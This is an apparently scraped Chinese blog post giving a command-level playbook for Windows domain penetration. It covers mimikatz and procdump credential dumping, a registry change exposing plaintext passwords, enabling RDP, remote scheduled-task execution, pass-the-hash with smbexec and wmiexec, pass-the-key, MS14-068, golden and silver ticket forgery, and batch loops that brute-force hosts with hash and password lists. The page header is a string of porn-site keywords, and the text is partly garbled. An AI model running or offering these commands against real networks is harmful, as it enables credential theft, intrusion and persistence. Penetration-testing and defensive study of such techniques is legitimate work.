日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内网渗透-域渗透简单思路

發(fā)布時(shí)間:2024/6/3 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网渗透-域渗透简单思路 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

文章目錄

  • 1.權(quán)限提升
  • 2.滲透姿勢(shì)
    • 爆hash,爆aes key
      • 爆hash
      • 爆aes key
  • 3.遠(yuǎn)程登錄
    • 注冊(cè)表修改
    • 連接命令
  • 4.連接操作
  • PTH攻擊(利用明文或hash連接)
      • IPC(明文連接主機(jī))
      • WMI(利用明文連接)
      • SMB(利用明文或hash連接)
      • RDP(利用明文或hash連接)
      • WMI工具(利用明文或hash連接)
  • PTK攻擊(aes key 進(jìn)行連接)
  • PTT攻擊(權(quán)限維持)
    • Golden ticket(黃金票據(jù))
    • silver ticket(白銀票據(jù))
  • 5.bat批量連接測(cè)試

1.權(quán)限提升

  • 一開始一定要提到administrator或以上,才好繼續(xù)內(nèi)網(wǎng)滲透。

2.滲透姿勢(shì)

爆hash,爆aes key

爆hash

域用戶主機(jī)上傳mimikatz

  • mimikatz.exe上執(zhí)行: privilege::debug sekurlsa::logonpasswords 則可報(bào)出hash
  • 當(dāng)目標(biāo)為win10或2012R2以上時(shí),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼,但可以通過修改注冊(cè)表的方式抓取明文。
  • reg add
    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
    UseLogonCredential /t REG_DWORD /d 1 /f

procdump

  • procdump -accepteula -ma lsass.exe lsass.dmp mimikatz.exe上執(zhí)行:
  • sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords

爆aes key

3.遠(yuǎn)程登錄

注冊(cè)表修改

開啟的3389方法:
1.通用開3389(優(yōu)化后):

  • wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call
    SetAllowTSConnections 1

2.For Win2003:

  • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v
    fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.For Win2008:

  • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v
    fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.For Every:
cmd開3389 win08 win03 win7 win2012 winxp
win08,三條命令即可:

  • wmic /namespace:\root\cimv2 erminalservices path
    win32_terminalservicesetting where (__CLASS != “”) call
    setallowtsconnections 1

  • wmic /namespace:\root\cimv2 erminalservices path
    win32_tsgeneralsetting where (TerminalName =‘RDP-Tcp’) call
    setuserauthenticationrequired 1

  • reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v
    fSingleSessionPerUser /t REG_DWORD /d 0 /f

win2012通用;win7前兩條即可。權(quán)限需要run as administrator。

連接命令

  • windows: mstsc
  • linux: rdesktop 192.168.3.21:3389

4.連接操作

PTH攻擊(利用明文或hash連接)

IPC(明文連接主機(jī))

在拿下一臺(tái)內(nèi)網(wǎng)主機(jī)后,通過本地信息搜集收集用戶憑證等信息后,如何橫向滲透拿下更多的主機(jī)?這里僅介紹at&schtasks命令及相關(guān)工具的使用,在已知目標(biāo)系統(tǒng)的用戶明文密碼或者h(yuǎn)ash的基礎(chǔ)上,直接可以在遠(yuǎn)程主機(jī)上執(zhí)行命令。

獲取到某域主機(jī)權(quán)限->minikatz得到密碼(明文,hash)->用到信息收集里面域用戶的列表當(dāng)做用戶名字典->用到密碼明文,hash當(dāng)做密碼字典-》嘗試連接->創(chuàng)建計(jì)劃任務(wù)(at|schtasks)->執(zhí)行文件可為后門或者相關(guān)命令

一、利用流程

  • 建立IPC鏈接到目標(biāo)主機(jī)
  • 拷貝要執(zhí)行的命令腳本到目標(biāo)主機(jī)
  • 查看目標(biāo)時(shí)間,創(chuàng)建計(jì)劃任務(wù)(at、schtasks)定時(shí)執(zhí)行拷貝到的腳本
  • 刪除IPC鏈接
  • net use \server\ipc$“password” /user:username # 工作組
    net use \server\ipc$“password” /user:domain\username #域內(nèi)

    dir \xx.xx.xx.xx\C$\ # 查看文件列表
    copy \xx.xx.xx.xx\C$\1.bat 1.bat # 下載文件
    copy 1.bat \xx.xx.xx.xx\C$\1.bat # 復(fù)制文件
    net use \xx.xx.xx.xx\C$\1.bat /del # 刪除IPC
    net view xx.xx.xx.xx # 查看對(duì)方共享

    建立IPC常見的錯(cuò)誤代碼
    (1)5:拒絕訪問,可能是使用的用戶不是管理員權(quán)限,需要先提升權(quán)限
    (2)51:網(wǎng)絡(luò)問題,Windows 無法找到網(wǎng)絡(luò)路徑
    (3)53:找不到網(wǎng)絡(luò)路徑,可能是IP地址錯(cuò)誤、目標(biāo)未開機(jī)、目標(biāo)Lanmanserver服務(wù)未啟動(dòng)、有防火墻等問題
    (4)67:找不到網(wǎng)絡(luò)名,本地Lanmanworkstation服務(wù)未啟動(dòng),目標(biāo)刪除ipc$
    (5)1219:提供的憑據(jù)和已存在的憑據(jù)集沖突,說明已建立IPC$,需要先刪除
    (6)1326:賬號(hào)密碼錯(cuò)誤
    (7)1792:目標(biāo)NetLogon服務(wù)未啟動(dòng),連接域控常常會(huì)出現(xiàn)此情況
    (8)2242:用戶密碼過期,目標(biāo)有賬號(hào)策略,強(qiáng)制定期更改密碼

    建立IPC失敗的原因
    (1)目標(biāo)系統(tǒng)不是NT或以上的操作系統(tǒng)
    (2)對(duì)方?jīng)]有打開IPC$共享
    (3)對(duì)方未開啟139、445端口,或者被防火墻屏蔽
    (4)輸出命令、賬號(hào)密碼有錯(cuò)誤

    二、[at] & [schtasks]
    #at 小于等于windows2008
    net use \192.168.1.5 Password /user:admin # 建立ipc連接:
    copy add.bat \192.168.1.5\C$\Inetpub # 拷貝執(zhí)行腳本到目標(biāo)機(jī)器
    net time \192.168.1.5 # 查看目標(biāo)時(shí)間,可能本地時(shí)間與目標(biāo)時(shí)間不符
    at \192.168.1.5 21:52 c:\Inetpub\add.bat # 添加計(jì)劃任務(wù)
    at \192.168.1.5 # 查看任務(wù)列表

    #schtasks 大于windows2008
    net use \192.168.1.5 Password /user:admin # 建立ipc連接:
    copy add.bat \192.168.1.5\C$\Inetpub # 拷貝執(zhí)行腳本到目標(biāo)機(jī)器
    net time \192.168.1.5 # 查看目標(biāo)時(shí)間,可能本地時(shí)間與目標(biāo)時(shí)間不符
    schtasks /create /s 192.168.1.5 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\Inetpub\add.bat /F #創(chuàng)建adduser計(jì)劃任務(wù)
    schtasks /run /s 192.168.1.5 /tn adduser /i #運(yùn)行adduser計(jì)劃任務(wù)
    schtasks /delete /s 192.168.1.5 /tn adduser /f # 刪除計(jì)劃任務(wù)

    WMI(利用明文連接)

    自帶WMIC 明文傳遞 無回顯

    • wmic /node:192.168.3.21 /user:administrator /password:Admin12345
      process call create “cmd.exe /c ipconfig >C:\1.txt”

    SMB(利用明文或hash連接)

    • smbexec ./admin:password@192.168.3.21
    • smbexec domain/admin:password@192.168.3.21
    • smbexec -hashes :HASH ./admin@192.168.3.21
    • smbbexec -hashes :HASH domain/admin@192.168.3.21
    • smbexec -hashes :ccef208c6485269c20db2cad21734fe7
      ./administrator@192.168.3.21

    RDP(利用明文或hash連接)

    • 除了上述講到的IPC,WMI,SMB等協(xié)議的鏈接外,獲取到的明文密碼或HASH密文也可以通過RDP協(xié)議進(jìn)行鏈接操作。

    RDP明文密碼鏈接

    • windows: mstsc
    • linux: rdesktop 192.168.3.21:3389

    RDP密文HASH鏈接

    • windows Server需要開啟 Restricted Admin mode,在Windows 8.1和Windows Server
      2012 R2中默認(rèn)開啟,同時(shí)如果Win 7 和Windows Server 2008
      R2安裝了2871997、2973351補(bǔ)丁也支持;開啟命令:
    • REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v
      DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

    開啟后運(yùn)行:

    • mstsc.exe /restrictedadmin
    • mimikatz.exe
    • privilege::debug
    • sekurlsa::pth /user:administrator /domain:remoteserver
      /ntlm:d25ecd13fddbb542d2e16da4f9e0333d “/run:mstsc.exe
      /restrictedadmin”

    WMI工具(利用明文或hash連接)

    • wmiexec ./administrator:Admin12345@192.168.3.21 “whoami”
    • wmiexec -hashes :HASH ./admin@192.168.3.21 “whoami”
    • wmiexec -hashes :ccef208c6485269c20db2cad21734fe7
      ./administrator@192.168.3.21 “whoami”

    PTK攻擊(aes key 進(jìn)行連接)

    PTK(pass the key) #利用的aeskey進(jìn)行的滲透測(cè)試

    #獲取用戶aes key
    mimikatz “privilege::debug” “sekurlsa::ekeys”

    #注入aes key
    mimikatz “privilege::debug” “sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288”

    #目標(biāo)系統(tǒng):安裝kb2871997補(bǔ)丁

    PTT攻擊(權(quán)限維持)

    Kerberos協(xié)議在域中,簡(jiǎn)要介紹一下

    • 客戶機(jī)將明文密碼進(jìn)行NTLM哈希,然后和時(shí)間戳一起加密(使用krbtgt密碼hash作為密鑰),發(fā)送給kdc(域控),kdc對(duì)用戶進(jìn)行檢測(cè),成功之后創(chuàng)建TGT(Ticket-Granting
      Ticket)
    • 將TGT進(jìn)行加密簽名返回給客戶機(jī)器,只有域用戶krbtgt才能讀取kerberos中TGT數(shù)據(jù)
    • 然后客戶機(jī)將TGT發(fā)送給域控制器KDC請(qǐng)求TGS(票證授權(quán)服務(wù))票證,并且對(duì)TGT進(jìn)行檢測(cè)
    • 檢測(cè)成功之后,將目標(biāo)服務(wù)賬戶的NTLM以及TGT進(jìn)行加密,將加密后的結(jié)果返回給客戶機(jī)。

    • ptt攻擊的部分就不是簡(jiǎn)單的NTLM認(rèn)證了,它是利用Kerberos協(xié)議進(jìn)行攻擊的,這里就介紹三種常見的攻擊方法:

    MS14-068,Golden ticket(黃金票據(jù)),SILVER ticket(白銀票據(jù))

    #MS14-068

    • #查看當(dāng)前sid whoami/user

    • mimikatz # kerberos::purge

    • //清空當(dāng)前機(jī)器中所有憑證,如果有域成員憑證會(huì)影響憑證偽造

    • mimikatz # kerberos::list

    • //查看當(dāng)前機(jī)器憑證

    • mimikatz # kerberos::ptc

    • 票據(jù)文件 //將票據(jù)注入到內(nèi)存中

    #利用ms14-068生成TGT數(shù)據(jù)

    • ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
    • MS14-068.exe -u mary@god.org -s
      S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p
      admin!@#45

    #票據(jù)注入

    • mimikatz.exe “kerberos::ptc TGT_mary@god.org.ccache” exit

    #查看憑證列表 klist
    #利用net use載入

    • net use \192.168.3.21\c$

    • dir \192.168.3.21\c$

    #利用kekeo生成TGT數(shù)據(jù)
    #生成票據(jù)

    • kekeo “tgt::ask /user:mary /domain:god.org
      /ntlm:518b98ad4178a53695dc997aa02d455c”

    #導(dǎo)入票據(jù)

    • kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

    #查看憑證 klist

    #利用net use載入

    • net use \192.168.3.21\c$

    • dir \192.168.3.21\c$

    權(quán)限維持-Golden ticket

    Golden ticket(黃金票據(jù))

    • Golden
      ticket的作用是可以生成任意用戶的tgt,那么問題就來了,是什么條件能夠讓他生成任意用戶的tgt呢?還得要看kerberos認(rèn)證的過程,在windows認(rèn)證過程中,客戶端將自己的信息發(fā)送給KDC,然后KDC使用krbtgt用戶密碼的hash作為密鑰進(jìn)行加密,生成TGT。那么如果獲取到了krbtgt的密碼hash值,是不是就可以偽造任意tgt了。因?yàn)閗rbtgt只有域控制器上面才有,所以使用黃金憑據(jù)意味著你之前拿到過域控制器的權(quán)限,黃金憑據(jù)可以理解為一個(gè)后門。

    #偽造黃金憑據(jù)需要具備下面條件:

    • krbtgt用戶的hash(有域控制器權(quán)限)
    • 域名稱
    • 域的SID值
    • 要偽造的用戶名

    #域控DC導(dǎo)出hash krbtgt

    • privilege::debug

    • lsadump::lsa /patch

    • b097d7ed97495408e1537f706c357fc5

    #生成tgt憑證

    • mimikatz # kerberos::golden /user:administrator /domain::god.org
      /sid:S-1-5-21-1218902331-2157346161-1782232778-1124
      /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket

    #注入憑證

    • mimikatz # kerberos::ptt ticket.kirbi

    #查看憑證 klist

    ##利用net use載入

    • net use \192.168.3.21\c$

    • dir \192.168.3.21\c$

    權(quán)限維持-silver ticket

    silver ticket(白銀票據(jù))

    • silver ticket和golden
      ticket不同的是,它不需要和域控制器進(jìn)行通信,原理是偽造TGS,使用的是計(jì)算機(jī)賬戶的hash進(jìn)行加密的,所以只能訪問指定的權(quán)限。不像是Golden
      ticket,是由krgtgt用戶的密碼hash進(jìn)行加密,偽造tgt可以獲取到所有權(quán)限。白銀票據(jù)這里只是對(duì)單一的服務(wù)進(jìn)行授權(quán),利用過程和golden
      ticket差不多,首先上域控制器中,把機(jī)器的ntlm hash(rc4加密)
      dump下來,然后在普通域用戶機(jī)器進(jìn)行偽造權(quán)限,進(jìn)行ptt.

    #域控導(dǎo)出hash

    • privilege::debug
    • sekurlsa::logonpasswords

    #攻擊3.21下的cifs(文件共享服務(wù))

    • kerberos::golden /domain:god.org
      /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:192.168.3.21
      /rc4:8432d4fa4430ecf56927dbabd1b4d36b /service:cifs /user:mary /ptt

    PTT(pass the ticket) #利用的票據(jù)憑證TGT進(jìn)行的滲透測(cè)試

    5.bat批量連接測(cè)試

    #利用hash驗(yàn)證主機(jī)列表ips.txt
    FOR /F %%i in (ips.txt) do atexec.exe -hashes :HASH ./administrator@%%i whoami

    #指定主機(jī)進(jìn)行用戶hash列表(hashes.txt)爆破
    FOR /F %%i in (hashes.txt) do atexec.exe -hashes %%i ./administrator@192.168.3.76 whoami

    #指定主機(jī)進(jìn)行明文密碼列表(passwords.txt)爆破

    FOR /F %%i in (passwords.txt) do atexec.exe ./administrator:%%i@192.168.3.76 whoami

    #利用明文密碼驗(yàn)證主機(jī)列表ips.txt
    FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password123@%%i whoami

    與50位技術(shù)專家面對(duì)面20年技術(shù)見證,附贈(zèng)技術(shù)全景圖

    總結(jié)

    以上是生活随笔為你收集整理的内网渗透-域渗透简单思路的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。